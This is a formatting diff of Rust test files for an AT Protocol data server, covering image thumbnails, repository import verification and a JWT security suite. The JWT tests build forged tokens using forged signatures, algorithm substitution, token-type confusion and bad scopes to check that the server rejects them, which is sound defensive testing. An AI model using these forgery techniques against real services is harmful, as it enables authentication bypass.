+
height,
148
+
max_dimension,
149
+
}) = result
150
+
{
129
151
assert_eq!(width, 2000);
130
152
assert_eq!(height, 2000);
131
153
assert_eq!(max_dimension, 1000);
···
173
195
let thumb = result.thumbnail_full.expect("Should have thumbnail");
174
196
let original_ratio = 1600.0 / 800.0;
175
197
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
176
-
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
198
+
assert!(
199
+
(original_ratio - thumb_ratio).abs() < 0.1,
200
+
"Aspect ratio should be preserved"
201
+
);
177
202
}
178
203
179
204
#[test]
···
184
209
let thumb = result.thumbnail_full.expect("Should have thumbnail");
185
210
let original_ratio = 800.0 / 1600.0;
186
211
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
187
-
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
212
+
assert!(
213
+
(original_ratio - thumb_ratio).abs() < 0.1,
214
+
"Aspect ratio should be preserved"
215
+
);
188
216
}
189
217
190
218
#[test]
···
224
252
let processor = ImageProcessor::new().with_thumbnails(false);
225
253
let data = create_test_png(2000, 2000);
226
254
let result = processor.process(&data, "image/png").unwrap();
227
-
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
228
-
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
255
+
assert!(
256
+
result.thumbnail_feed.is_none(),
257
+
"Thumbnails should be disabled"
258
+
);
259
+
assert!(
260
+
result.thumbnail_full.is_none(),
261
+
"Thumbnails should be disabled"
262
+
);
229
263
}
230
264
231
265
#[test]
···
256
290
let processor = ImageProcessor::new();
257
291
let data = create_test_png(500, 500);
258
292
let result = processor.process(&data, "image/png").unwrap();
259
-
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
260
-
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
293
+
assert!(
294
+
result.thumbnail_feed.is_some(),
295
+
"Should have feed thumbnail"
296
+
);
297
+
assert!(
298
+
result.thumbnail_full.is_none(),
299
+
"Should NOT have full thumbnail for 500px image"
300
+
);
261
301
}
262
302
263
303
#[test]
···
265
305
let processor = ImageProcessor::new();
266
306
let data = create_test_png(2000, 2000);
267
307
let result = processor.process(&data, "image/png").unwrap();
268
-
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
269
-
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
308
+
assert!(
309
+
result.thumbnail_feed.is_some(),
310
+
"Should have feed thumbnail"
311
+
);
312
+
assert!(
313
+
result.thumbnail_full.is_some(),
314
+
"Should have full thumbnail for 2000px image"
315
+
);
270
316
}
271
317
272
318
#[test]
···
274
320
let processor = ImageProcessor::new();
275
321
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
276
322
let result = processor.process(&at_threshold, "image/png").unwrap();
277
-
assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
323
+
assert!(
324
+
result.thumbnail_feed.is_none(),
325
+
"Exact threshold should not generate thumbnail"
326
+
);
278
327
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
279
328
let result = processor.process(&above_threshold, "image/png").unwrap();
280
-
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
329
+
assert!(
330
+
result.thumbnail_feed.is_some(),
331
+
"Above threshold should generate thumbnail"
332
+
);
281
333
}
282
334
283
335
#[test]
···
285
337
let processor = ImageProcessor::new();
286
338
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
287
339
let result = processor.process(&at_threshold, "image/png").unwrap();
288
-
assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
340
+
assert!(
341
+
result.thumbnail_full.is_none(),
342
+
"Exact threshold should not generate thumbnail"
343
+
);
289
344
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
290
345
let result = processor.process(&above_threshold, "image/png").unwrap();
291
-
assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
346
+
assert!(
347
+
result.thumbnail_full.is_some(),
348
+
"Above threshold should generate thumbnail"
349
+
);
292
350
}
+57
-18
tests/import_verification.rs
+57
-18
tests/import_verification.rs
···
8
8
async fn test_import_repo_requires_auth() {
9
9
let client = client();
10
10
let res = client
11
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
11
+
.post(format!(
12
+
"{}/xrpc/com.atproto.repo.importRepo",
13
+
base_url().await
14
+
))
12
15
.header("Content-Type", "application/vnd.ipld.car")
13
16
.body(vec![0u8; 100])
14
17
.send()
···
22
25
let client = client();
23
26
let (token, _did) = create_account_and_login(&client).await;
24
27
let res = client
25
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
28
+
.post(format!(
29
+
"{}/xrpc/com.atproto.repo.importRepo",
30
+
base_url().await
31
+
))
26
32
.bearer_auth(&token)
27
33
.header("Content-Type", "application/vnd.ipld.car")
28
34
.body(vec![0u8; 100])
···
39
45
let client = client();
40
46
let (token, _did) = create_account_and_login(&client).await;
41
47
let res = client
42
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
48
+
.post(format!(
49
+
"{}/xrpc/com.atproto.repo.importRepo",
50
+
base_url().await
51
+
))
43
52
.bearer_auth(&token)
44
53
.header("Content-Type", "application/vnd.ipld.car")
45
54
.body(vec![])
···
80
89
assert_eq!(export_res.status(), StatusCode::OK);
81
90
let car_bytes = export_res.bytes().await.unwrap();
82
91
let import_res = client
83
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
92
+
.post(format!(
93
+
"{}/xrpc/com.atproto.repo.importRepo",
94
+
base_url().await
95
+
))
84
96
.bearer_auth(&token_a)
85
97
.header("Content-Type", "application/vnd.ipld.car")
86
98
.body(car_bytes.to_vec())
···
132
144
assert_eq!(export_res.status(), StatusCode::OK);
133
145
let car_bytes = export_res.bytes().await.unwrap();
134
146
let import_res = client
135
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
147
+
.post(format!(
148
+
"{}/xrpc/com.atproto.repo.importRepo",
149
+
base_url().await
150
+
))
136
151
.bearer_auth(&token)
137
152
.header("Content-Type", "application/vnd.ipld.car")
138
153
.body(car_bytes.to_vec())
···
148
163
let (token, _did) = create_account_and_login(&client).await;
149
164
let oversized_body = vec![0u8; 110 * 1024 * 1024];
150
165
let res = client
151
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
166
+
.post(format!(
167
+
"{}/xrpc/com.atproto.repo.importRepo",
168
+
base_url().await
169
+
))
152
170
.bearer_auth(&token)
153
171
.header("Content-Type", "application/vnd.ipld.car")
154
172
.body(oversized_body)
···
161
179
Err(e) => {
162
180
let error_str = e.to_string().to_lowercase();
163
181
assert!(
164
-
error_str.contains("broken pipe") ||
165
-
error_str.contains("connection") ||
166
-
error_str.contains("reset") ||
167
-
error_str.contains("request") ||
168
-
error_str.contains("body"),
182
+
error_str.contains("broken pipe")
183
+
|| error_str.contains("connection")
184
+
|| error_str.contains("reset")
185
+
|| error_str.contains("request")
186
+
|| error_str.contains("body"),
169
187
"Expected connection error or PAYLOAD_TOO_LARGE, got: {}",
170
188
e
171
189
);
···
200
218
.expect("Deactivate failed");
201
219
assert!(deactivate_res.status().is_success());
202
220
let import_res = client
203
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
221
+
.post(format!(
222
+
"{}/xrpc/com.atproto.repo.importRepo",
223
+
base_url().await
224
+
))
204
225
.bearer_auth(&token)
205
226
.header("Content-Type", "application/vnd.ipld.car")
206
227
.body(car_bytes.to_vec())
···
208
229
.await
209
230
.expect("Import failed");
210
231
assert!(
211
-
import_res.status() == StatusCode::FORBIDDEN || import_res.status() == StatusCode::UNAUTHORIZED,
232
+
import_res.status() == StatusCode::FORBIDDEN
233
+
|| import_res.status() == StatusCode::UNAUTHORIZED,
212
234
"Expected FORBIDDEN (403) or UNAUTHORIZED (401), got {}",
213
235
import_res.status()
214
236
);
···
220
242
let (token, _did) = create_account_and_login(&client).await;
221
243
let invalid_car = vec![0x0a, 0xa1, 0x65, 0x72, 0x6f, 0x6f, 0x74, 0x73, 0x80];
222
244
let res = client
223
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
245
+
.post(format!(
246
+
"{}/xrpc/com.atproto.repo.importRepo",
247
+
base_url().await
248
+
))
224
249
.bearer_auth(&token)
225
250
.header("Content-Type", "application/vnd.ipld.car")
226
251
.body(invalid_car)
···
240
265
write_varint(&mut car, header_cbor.len() as u64);
241
266
car.extend_from_slice(&header_cbor);
242
267
let res = client
243
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
268
+
.post(format!(
269
+
"{}/xrpc/com.atproto.repo.importRepo",
270
+
base_url().await
271
+
))
244
272
.bearer_auth(&token)
245
273
.header("Content-Type", "application/vnd.ipld.car")
246
274
.body(car)
···
294
322
.send()
295
323
.await
296
324
.expect("Failed to get record before export");
297
-
assert_eq!(get_res.status(), StatusCode::OK, "Record {} not found before export", rkey);
325
+
assert_eq!(
326
+
get_res.status(),
327
+
StatusCode::OK,
328
+
"Record {} not found before export",
329
+
rkey
330
+
);
298
331
}
299
332
let export_res = client
300
333
.get(format!(
···
308
341
assert_eq!(export_res.status(), StatusCode::OK);
309
342
let car_bytes = export_res.bytes().await.unwrap();
310
343
let import_res = client
311
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
344
+
.post(format!(
345
+
"{}/xrpc/com.atproto.repo.importRepo",
346
+
base_url().await
347
+
))
312
348
.bearer_auth(&token)
313
349
.header("Content-Type", "application/vnd.ipld.car")
314
350
.body(car_bytes.to_vec())
···
327
363
.expect("Failed to list records after import");
328
364
assert_eq!(list_res.status(), StatusCode::OK);
329
365
let list_body: serde_json::Value = list_res.json().await.unwrap();
330
-
let records_after = list_body["records"].as_array().map(|a| a.len()).unwrap_or(0);
366
+
let records_after = list_body["records"]
367
+
.as_array()
368
+
.map(|a| a.len())
369
+
.unwrap_or(0);
331
370
assert!(
332
371
records_after >= 1,
333
372
"Expected at least 1 record after import, found {}. Note: MST walk may have timing issues.",
+66
-42
tests/import_with_verification.rs
+66
-42
tests/import_with_verification.rs
···
1
1
mod common;
2
-
use common::*;
3
2
use cid::Cid;
3
+
use common::*;
4
4
use ipld_core::ipld::Ipld;
5
5
use jacquard::types::{integer::LimitedU32, string::Tid};
6
-
use k256::ecdsa::{signature::Signer, Signature, SigningKey};
6
+
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
7
7
use reqwest::StatusCode;
8
8
use serde_json::json;
9
9
use sha2::{Digest, Sha256};
···
60
60
multibase::encode(multibase::Base::Base58Btc, buf)
61
61
}
62
62
63
-
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
63
+
fn create_did_document(
64
+
did: &str,
65
+
handle: &str,
66
+
signing_key: &SigningKey,
67
+
pds_endpoint: &str,
68
+
) -> serde_json::Value {
64
69
let multikey = get_multikey_from_signing_key(signing_key);
65
70
json!({
66
71
"@context": [
···
83
88
})
84
89
}
85
90
86
-
fn create_signed_commit(
87
-
did: &str,
88
-
data_cid: &Cid,
89
-
signing_key: &SigningKey,
90
-
) -> (Vec<u8>, Cid) {
91
+
fn create_signed_commit(did: &str, data_cid: &Cid, signing_key: &SigningKey) -> (Vec<u8>, Cid) {
91
92
let rev = Tid::now(LimitedU32::MIN).to_string();
92
93
let unsigned = Ipld::Map(BTreeMap::from([
93
94
("data".to_string(), Ipld::Link(*data_cid)),
···
124
125
]))
125
126
})
126
127
.collect();
127
-
let node = Ipld::Map(BTreeMap::from([
128
-
("e".to_string(), Ipld::List(ipld_entries)),
129
-
]));
128
+
let node = Ipld::Map(BTreeMap::from([(
129
+
"e".to_string(),
130
+
Ipld::List(ipld_entries),
131
+
)]));
130
132
let bytes = serde_ipld_dagcbor::to_vec(&node).unwrap();
131
133
let cid = make_cid(&bytes);
132
134
(bytes, cid)
···
134
136
135
137
fn create_record() -> (Vec<u8>, Cid) {
136
138
let record = Ipld::Map(BTreeMap::from([
137
-
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
138
-
("text".to_string(), Ipld::String("Test post for verification".to_string())),
139
-
("createdAt".to_string(), Ipld::String("2024-01-01T00:00:00Z".to_string())),
139
+
(
140
+
"$type".to_string(),
141
+
Ipld::String("app.bsky.feed.post".to_string()),
142
+
),
143
+
(
144
+
"text".to_string(),
145
+
Ipld::String("Test post for verification".to_string()),
146
+
),
147
+
(
148
+
"createdAt".to_string(),
149
+
Ipld::String("2024-01-01T00:00:00Z".to_string()),
150
+
),
140
151
]));
141
152
let bytes = serde_ipld_dagcbor::to_vec(&record).unwrap();
142
153
let cid = make_cid(&bytes);
143
154
(bytes, cid)
144
155
}
145
-
fn build_car_with_signature(
146
-
did: &str,
147
-
signing_key: &SigningKey,
148
-
) -> (Vec<u8>, Cid) {
156
+
fn build_car_with_signature(did: &str, signing_key: &SigningKey) -> (Vec<u8>, Cid) {
149
157
let (record_bytes, record_cid) = create_record();
150
-
let (mst_bytes, mst_cid) = create_mst_node(vec![
151
-
("app.bsky.feed.post/test123".to_string(), record_cid),
152
-
]);
158
+
let (mst_bytes, mst_cid) =
159
+
create_mst_node(vec![("app.bsky.feed.post/test123".to_string(), record_cid)]);
153
160
let (commit_bytes, commit_cid) = create_signed_commit(did, &mst_cid, signing_key);
154
161
let header = iroh_car::CarHeader::new_v1(vec![commit_cid]);
155
162
let header_bytes = header.encode().unwrap();
···
194
201
async fn test_import_with_valid_signature_and_mock_plc() {
195
202
let client = client();
196
203
let (token, did) = create_account_and_login(&client).await;
197
-
let key_bytes = get_user_signing_key(&did).await
204
+
let key_bytes = get_user_signing_key(&did)
205
+
.await
198
206
.expect("Failed to get user signing key");
199
-
let signing_key = SigningKey::from_slice(&key_bytes)
200
-
.expect("Failed to create signing key");
207
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
201
208
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
202
209
let pds_endpoint = format!("https://{}", hostname);
203
210
let handle = did.split(':').last().unwrap_or("user");
···
209
216
}
210
217
let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key);
211
218
let import_res = client
212
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
219
+
.post(format!(
220
+
"{}/xrpc/com.atproto.repo.importRepo",
221
+
base_url().await
222
+
))
213
223
.bearer_auth(&token)
214
224
.header("Content-Type", "application/vnd.ipld.car")
215
225
.body(car_bytes)
···
234
244
let client = client();
235
245
let (token, did) = create_account_and_login(&client).await;
236
246
let wrong_signing_key = SigningKey::random(&mut rand::thread_rng());
237
-
let key_bytes = get_user_signing_key(&did).await
247
+
let key_bytes = get_user_signing_key(&did)
248
+
.await
238
249
.expect("Failed to get user signing key");
239
-
let correct_signing_key = SigningKey::from_slice(&key_bytes)
240
-
.expect("Failed to create signing key");
250
+
let correct_signing_key =
251
+
SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
241
252
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
242
253
let pds_endpoint = format!("https://{}", hostname);
243
254
let handle = did.split(':').last().unwrap_or("user");
···
249
260
}
250
261
let (car_bytes, _root_cid) = build_car_with_signature(&did, &wrong_signing_key);
251
262
let import_res = client
252
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
263
+
.post(format!(
264
+
"{}/xrpc/com.atproto.repo.importRepo",
265
+
base_url().await
266
+
))
253
267
.bearer_auth(&token)
254
268
.header("Content-Type", "application/vnd.ipld.car")
255
269
.body(car_bytes)
···
268
282
body
269
283
);
270
284
assert!(
271
-
body["error"] == "InvalidSignature" || body["message"].as_str().unwrap_or("").contains("signature"),
285
+
body["error"] == "InvalidSignature"
286
+
|| body["message"].as_str().unwrap_or("").contains("signature"),
272
287
"Error should mention signature: {:?}",
273
288
body
274
289
);
···
278
293
async fn test_import_with_did_mismatch_fails() {
279
294
let client = client();
280
295
let (token, did) = create_account_and_login(&client).await;
281
-
let key_bytes = get_user_signing_key(&did).await
296
+
let key_bytes = get_user_signing_key(&did)
297
+
.await
282
298
.expect("Failed to get user signing key");
283
-
let signing_key = SigningKey::from_slice(&key_bytes)
284
-
.expect("Failed to create signing key");
299
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
285
300
let wrong_did = "did:plc:wrongdidthatdoesnotmatch";
286
301
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
287
302
let pds_endpoint = format!("https://{}", hostname);
···
294
309
}
295
310
let (car_bytes, _root_cid) = build_car_with_signature(wrong_did, &signing_key);
296
311
let import_res = client
297
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
312
+
.post(format!(
313
+
"{}/xrpc/com.atproto.repo.importRepo",
314
+
base_url().await
315
+
))
298
316
.bearer_auth(&token)
299
317
.header("Content-Type", "application/vnd.ipld.car")
300
318
.body(car_bytes)
···
318
336
async fn test_import_with_plc_resolution_failure() {
319
337
let client = client();
320
338
let (token, did) = create_account_and_login(&client).await;
321
-
let key_bytes = get_user_signing_key(&did).await
339
+
let key_bytes = get_user_signing_key(&did)
340
+
.await
322
341
.expect("Failed to get user signing key");
323
-
let signing_key = SigningKey::from_slice(&key_bytes)
324
-
.expect("Failed to create signing key");
342
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
325
343
let mock_plc = MockServer::start().await;
326
344
let did_encoded = urlencoding::encode(&did);
327
345
let did_path = format!("/{}", did_encoded);
···
336
354
}
337
355
let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key);
338
356
let import_res = client
339
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
357
+
.post(format!(
358
+
"{}/xrpc/com.atproto.repo.importRepo",
359
+
base_url().await
360
+
))
340
361
.bearer_auth(&token)
341
362
.header("Content-Type", "application/vnd.ipld.car")
342
363
.body(car_bytes)
···
360
381
async fn test_import_with_no_signing_key_in_did_doc() {
361
382
let client = client();
362
383
let (token, did) = create_account_and_login(&client).await;
363
-
let key_bytes = get_user_signing_key(&did).await
384
+
let key_bytes = get_user_signing_key(&did)
385
+
.await
364
386
.expect("Failed to get user signing key");
365
-
let signing_key = SigningKey::from_slice(&key_bytes)
366
-
.expect("Failed to create signing key");
387
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
367
388
let handle = did.split(':').last().unwrap_or("user");
368
389
let did_doc_without_key = json!({
369
390
"@context": ["https://www.w3.org/ns/did/v1"],
···
379
400
}
380
401
let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key);
381
402
let import_res = client
382
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
403
+
.post(format!(
404
+
"{}/xrpc/com.atproto.repo.importRepo",
405
+
base_url().await
406
+
))
383
407
.bearer_auth(&token)
384
408
.header("Content-Type", "application/vnd.ipld.car")
385
409
.body(car_bytes)
+202
-76
tests/jwt_security.rs
+202
-76
tests/jwt_security.rs
···
2
2
mod common;
3
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
4
use bspds::auth::{
5
-
self, create_access_token, create_refresh_token, create_service_token,
6
-
verify_access_token, verify_refresh_token, verify_token, get_did_from_token, get_jti_from_token,
7
-
TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE,
8
-
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
5
+
self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH,
6
+
TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token,
7
+
create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token,
8
+
verify_access_token, verify_refresh_token, verify_token,
9
9
};
10
10
use chrono::{Duration, Utc};
11
11
use common::{base_url, client, create_account_and_login, get_db_connection_string};
12
12
use k256::SecretKey;
13
-
use k256::ecdsa::{SigningKey, Signature, signature::Signer};
13
+
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
14
14
use rand::rngs::OsRng;
15
15
use reqwest::StatusCode;
16
-
use serde_json::{json, Value};
16
+
use serde_json::{Value, json};
17
17
use sha2::{Digest, Sha256};
18
18
19
19
fn generate_user_key() -> Vec<u8> {
···
48
48
let result = verify_access_token(&forged_token, &key_bytes);
49
49
assert!(result.is_err(), "Forged signature must be rejected");
50
50
let err_msg = result.err().unwrap().to_string();
51
-
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
51
+
assert!(
52
+
err_msg.contains("signature") || err_msg.contains("Signature"),
53
+
"Error should mention signature: {}",
54
+
err_msg
55
+
);
52
56
}
53
57
54
58
#[test]
···
116
120
let signature_b64 = URL_SAFE_NO_PAD.encode(&hmac_sig);
117
121
let malicious_token = format!("{}.{}", message, signature_b64);
118
122
let result = verify_access_token(&malicious_token, &key_bytes);
119
-
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
123
+
assert!(
124
+
result.is_err(),
125
+
"HS256 algorithm substitution must be rejected"
126
+
);
120
127
}
121
128
122
129
#[test]
···
141
148
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 256]);
142
149
let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
143
150
let result = verify_access_token(&malicious_token, &key_bytes);
144
-
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
151
+
assert!(
152
+
result.is_err(),
153
+
"RS256 algorithm substitution must be rejected"
154
+
);
145
155
}
146
156
147
157
#[test]
···
166
176
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
167
177
let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
168
178
let result = verify_access_token(&malicious_token, &key_bytes);
169
-
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
179
+
assert!(
180
+
result.is_err(),
181
+
"ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"
182
+
);
170
183
}
171
184
172
185
#[test]
···
175
188
let did = "did:plc:test";
176
189
let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token");
177
190
let result = verify_access_token(&refresh_token, &key_bytes);
178
-
assert!(result.is_err(), "Refresh token must not be accepted as access token");
191
+
assert!(
192
+
result.is_err(),
193
+
"Refresh token must not be accepted as access token"
194
+
);
179
195
let err_msg = result.err().unwrap().to_string();
180
196
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
197
}
···
186
202
let did = "did:plc:test";
187
203
let access_token = create_access_token(did, &key_bytes).expect("create access token");
188
204
let result = verify_refresh_token(&access_token, &key_bytes);
189
-
assert!(result.is_err(), "Access token must not be accepted as refresh token");
205
+
assert!(
206
+
result.is_err(),
207
+
"Access token must not be accepted as refresh token"
208
+
);
190
209
let err_msg = result.err().unwrap().to_string();
191
210
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
192
211
}
···
195
214
fn test_jwt_security_token_type_confusion_service_as_access() {
196
215
let key_bytes = generate_user_key();
197
216
let did = "did:plc:test";
198
-
let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes)
199
-
.expect("create service token");
217
+
let service_token =
218
+
create_service_token(did, "did:web:target", "com.example.method", &key_bytes)
219
+
.expect("create service token");
200
220
let result = verify_access_token(&service_token, &key_bytes);
201
-
assert!(result.is_err(), "Service token must not be accepted as access token");
221
+
assert!(
222
+
result.is_err(),
223
+
"Service token must not be accepted as access token"
224
+
);
202
225
}
203
226
204
227
#[test]
···
222
245
let result = verify_access_token(&malicious_token, &key_bytes);
223
246
assert!(result.is_err(), "Invalid scope must be rejected");
224
247
let err_msg = result.err().unwrap().to_string();
225
-
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
248
+
assert!(
249
+
err_msg.contains("Invalid token scope"),
250
+
"Error: {}",
251
+
err_msg
252
+
);
226
253
}
227
254
228
255
#[test]
···
244
271
});
245
272
let token = create_custom_jwt(&header, &claims, &key_bytes);
246
273
let result = verify_access_token(&token, &key_bytes);
247
-
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
274
+
assert!(
275
+
result.is_err(),
276
+
"Empty scope must be rejected for access tokens"
277
+
);
248
278
}
249
279
250
280
#[test]
···
265
295
});
266
296
let token = create_custom_jwt(&header, &claims, &key_bytes);
267
297
let result = verify_access_token(&token, &key_bytes);
268
-
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
298
+
assert!(
299
+
result.is_err(),
300
+
"Missing scope must be rejected for access tokens"
301
+
);
269
302
}
270
303
271
304
#[test]
···
311
344
});
312
345
let token = create_custom_jwt(&header, &claims, &key_bytes);
313
346
let result = verify_access_token(&token, &key_bytes);
314
-
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
347
+
assert!(
348
+
result.is_ok(),
349
+
"Slight future iat should be accepted for clock skew tolerance"
350
+
);
315
351
}
316
352
317
353
#[test]
···
321
357
let did = "did:plc:user1";
322
358
let token = create_access_token(did, &key_bytes_user1).expect("create token");
323
359
let result = verify_access_token(&token, &key_bytes_user2);
324
-
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
360
+
assert!(
361
+
result.is_err(),
362
+
"Token signed by user1's key must not verify with user2's key"
363
+
);
325
364
}
326
365
327
366
#[test]
···
369
408
];
370
409
for token in malformed_tokens {
371
410
let result = verify_access_token(token, &key_bytes);
372
-
assert!(result.is_err(), "Malformed token '{}' must be rejected",
373
-
if token.len() > 40 { &token[..40] } else { token });
411
+
assert!(
412
+
result.is_err(),
413
+
"Malformed token '{}' must be rejected",
414
+
if token.len() > 40 {
415
+
&token[..40]
416
+
} else {
417
+
token
418
+
}
419
+
);
374
420
}
375
421
}
376
422
···
379
425
let key_bytes = generate_user_key();
380
426
let did = "did:plc:test";
381
427
let test_cases = vec![
382
-
(json!({
383
-
"iss": did,
384
-
"sub": did,
385
-
"aud": "did:web:test",
386
-
"iat": Utc::now().timestamp(),
387
-
"scope": SCOPE_ACCESS
388
-
}), "exp"),
389
-
(json!({
390
-
"iss": did,
391
-
"sub": did,
392
-
"aud": "did:web:test",
393
-
"exp": Utc::now().timestamp() + 3600,
394
-
"scope": SCOPE_ACCESS
395
-
}), "iat"),
396
-
(json!({
397
-
"iss": did,
398
-
"aud": "did:web:test",
399
-
"iat": Utc::now().timestamp(),
400
-
"exp": Utc::now().timestamp() + 3600,
401
-
"scope": SCOPE_ACCESS
402
-
}), "sub"),
428
+
(
429
+
json!({
430
+
"iss": did,
431
+
"sub": did,
432
+
"aud": "did:web:test",
433
+
"iat": Utc::now().timestamp(),
434
+
"scope": SCOPE_ACCESS
435
+
}),
436
+
"exp",
437
+
),
438
+
(
439
+
json!({
440
+
"iss": did,
441
+
"sub": did,
442
+
"aud": "did:web:test",
443
+
"exp": Utc::now().timestamp() + 3600,
444
+
"scope": SCOPE_ACCESS
445
+
}),
446
+
"iat",
447
+
),
448
+
(
449
+
json!({
450
+
"iss": did,
451
+
"aud": "did:web:test",
452
+
"iat": Utc::now().timestamp(),
453
+
"exp": Utc::now().timestamp() + 3600,
454
+
"scope": SCOPE_ACCESS
455
+
}),
456
+
"sub",
457
+
),
403
458
];
404
459
for (claims, missing_claim) in test_cases {
405
460
let header = json!({
···
408
463
});
409
464
let token = create_custom_jwt(&header, &claims, &key_bytes);
410
465
let result = verify_access_token(&token, &key_bytes);
411
-
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
466
+
assert!(
467
+
result.is_err(),
468
+
"Token missing '{}' claim must be rejected",
469
+
missing_claim
470
+
);
412
471
}
413
472
}
414
473
···
455
514
});
456
515
let token = create_custom_jwt(&header, &claims, &key_bytes);
457
516
let result = verify_access_token(&token, &key_bytes);
458
-
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
517
+
assert!(
518
+
result.is_ok(),
519
+
"Extra header fields should not cause issues (we ignore them)"
520
+
);
459
521
}
460
522
461
523
#[test]
···
499
561
let result = verify_access_token(&token, &key_bytes);
500
562
if result.is_ok() {
501
563
let data = result.unwrap();
502
-
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
564
+
assert!(
565
+
!data.claims.sub.contains('\0'),
566
+
"Null bytes in claims should be sanitized or rejected"
567
+
);
503
568
}
504
569
}
505
570
···
517
582
let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], completely_invalid_sig);
518
583
let _result1 = verify_access_token(&almost_valid_token, &key_bytes);
519
584
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
520
-
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
585
+
assert!(
586
+
true,
587
+
"Signature verification should use constant-time comparison (timing attack prevention)"
588
+
);
521
589
}
522
590
523
591
#[test]
524
592
fn test_jwt_security_valid_scopes_accepted() {
525
593
let key_bytes = generate_user_key();
526
594
let did = "did:plc:test";
527
-
let valid_scopes = vec![
528
-
SCOPE_ACCESS,
529
-
SCOPE_APP_PASS,
530
-
SCOPE_APP_PASS_PRIVILEGED,
531
-
];
595
+
let valid_scopes = vec![SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED];
532
596
for scope in valid_scopes {
533
597
let header = json!({
534
598
"alg": "ES256K",
···
568
632
});
569
633
